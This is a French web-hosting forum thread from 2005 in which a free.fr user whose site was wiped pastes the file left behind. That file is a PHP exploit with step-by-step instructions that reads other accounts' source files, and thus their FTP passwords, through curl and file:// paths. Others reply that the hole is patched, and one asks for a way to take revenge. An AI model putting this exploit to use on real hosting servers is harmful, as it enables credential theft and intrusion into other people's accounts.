Freenews
Free - Messagerie et hébergement => Hébergement : pages persos et blogs => Discussion démarrée par: degrem_m le 26 December 2005 18:36:53
-
Salut,
J'ai un vieux site chez free, voir le premier que j'ai fait depuis que je fais des sites.
Et il y a une semaine, j'ai recut un mail me disant que mon site etait un fantome.
il n'y avait plus rien à part une page read.php contenant :
// Global.Security.Hacking presents:
//
// ------- *.Free.Fr Read File Local Exploit -------
//
// by: [m0rtix, Dk30, Nobody, SymptOme, Darkprox, Corefus3d, En3rgi]
//
//
// Apres la faille glob() classée Low, voici "DIMS"
// qui permet de lire la source de n'importe quel fichier
// se trouvant sur un xxx.free.fr. et donc pour un intru
// de saisir tous les mots-de-passes FTP des comptes Free.fr
//
//
// Utilisation:
//
// 1) Mettre un script sur un compte free.fr
// 2) Pinguer le compte xxx.free.Fr à attaquer
// 3) Si l'IP du compte free à attaquer est la même que
// celui de l'attaquant, l'attaque peut continuer.
// Dans le cas contraire, mettre le script sur un
// autre compte .free.fr ayant cette IP.
// 4) Utiliser la syntase suivante:
// http://attaquant.free.Fr/script.php?lala=/attaqué/fichier.php
//
// Exemple: http://gsh.free.fr/read.php?lala=/compte/index.php
//
// /! le compte à attaquer ne doit pas contenir de .free.fr dans la syntase http
// Ici c'est compte.free.fr qui sera attaqué (Ne pas mettre .free.Fr).
//
// Résultat: On aura la source de http://compte.free.fr/index.php
// :]
//
// Copyright 2005 - Tous droits réservés - GSH TeAM
// Irc.netmisphere.com #gsh
// [email protected]
// Le script:
$zone = array(
"a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
);
$lala = $_REQUEST['lala'];
foreach($zone as $first) {
foreach($zone as $second) {
$url = "file:///var/www/free.fr/$first/$second/$lala";
$ch = curl_init($url);
$b=curl_exec($ch);
if($b=='%<%') {
echo "$url
<![CDATA[";<br />curl_exec($ch);<br />curl_close($ch);<br />echo "]]>"; }
}
}
// TeAM GSH - 2005 - Copyright
?>
Est ce dèja arrivé a quelqu'un ?
-
Cette faille est censée être corrigée mais je peux me tromper. Il y a une discussion sur les newsgroups de la faille glob qui a dérivé (dans mes souvenirs) sur celle de cURL.
Savez-vous depuis quand ce compte est dans cet état là ?
-
je n'ai rien compris mais je croit que moi aussi il m'est arrivé la meme chose.
et je croit savoir qui m'a fait sa, si quelqu'un pouvait me donner le moyen de me venger sa serai cool!
merci
-
// 3) Si l'IP du compte free à attaquer est la même que
// celui de l'attaquant, l'attaque peut continuer.
j'ai du mal a saisir ce point...
-
// 3) Si l'IP du compte free à attaquer est la même que
// celui de l'attaquant, l'attaque peut continuer.
j'ai du mal a saisir ce point...
Ben, il faut que le compte des pages perso de la victime et celui de l'attaquant soient sur le même serveur.
-
$url = "file:///var/www/free.fr/$first/$second/$lala";
$ch = curl_init($url);
$b=curl_exec($ch);
if($b=='%<%') {
echo "$url
<![CDATA[";<br />curl_exec($ch);<br />curl_close($ch);<br />echo "]]>"; }
Elle est en principe patchée depuis un moment cette faille.